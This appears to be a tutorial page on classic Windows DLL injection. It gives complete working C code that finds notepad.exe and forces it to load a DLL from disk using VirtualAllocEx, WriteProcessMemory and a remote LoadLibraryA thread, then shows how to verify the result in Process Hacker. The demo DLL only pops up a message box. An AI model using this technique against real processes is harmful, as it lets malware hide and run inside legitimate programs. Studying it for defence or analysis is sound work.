DLL Injection

This Forcse a remote process to load our dll of our choice on disk.

  1. Allocate memory in remote process(VirtualAllocEx)

  2. Copy the path of our dll to the buffer(WriteProcessMemory)

  3. Locate the address of loadlibrary(GetProcAddress)

  4. Create a remote thread with the argument of load library and the path to our dll(CreateRemoteThread with address of LoadLibrary and path to DLL)

  5. Remote process will load our dll

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <tlhelp32.h>




DWORD FindProcessPid(const char* procname)
{
    PROCESSENTRY32 pe32 = { 0 };
    pe32.dwSize = sizeof(PROCESSENTRY32);

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); // takes a snapshot of all the processes running in the system
    if (hSnapshot)
    {
        if (Process32First(hSnapshot, &pe32)) // from the snapshot of the processes, we extract the process name
        {
            do
            {
                if (strcmp(pe32.szExeFile, procname) == 0) // compares the process name, with our user supplied name
                {
                    return pe32.th32ProcessID; // if its the same, return the process id
                }
            } while (Process32Next(hSnapshot, &pe32));
            CloseHandle(hSnapshot);
        }
    }

    return -1; // returns negative one if the process is not found
}

int main(void) {
    char dllpath[] = TEXT("C:\\simple.dll");
    int pid = FindProcessPid("notepad.exe");
    printf("notepad's Pid is %d\n", pid);

    void *pThreadStart = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32.dll"), "LoadLibraryA");
    HANDLE han_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, (DWORD)(pid));
    void * pRem = VirtualAllocEx(han_proc, NULL, sizeof(dllpath), MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(han_proc, pRem, (LPVOID)dllpath, sizeof(dllpath), NULL);
    CreateRemoteThread(han_proc, NULL, 0, (LPTHREAD_START_ROUTINE)pThreadStart, pRem, 0, NULL);
    CloseHandle(han_proc);
    getchar();
}

For the sake of simplicity, all my DLL does is popup a messagebox.

Alright, so lets see this in action.

As we can see, the PIDs match.

Now lets press enter and see our DLL get injected to the process. We then get a simple "attached" messagebox popup in our notepad process.

Let's investigate this further. Open up the notepad that got injected into and look at the DLLs of the process.

As we can see, our payload dll named "simple.dll" is loaded into the notepad process.

If we look at the threads of the process, we can see LoadLibraryA(which is used to load our dll) is one of them.

Now lets check to see the strings of notepad and see if the path to our dll is present in there. You can use the simple strings function in the memory tab in process hacker to search for a string.

You should be able to find the path to your dll in a memory region like this:

Last updated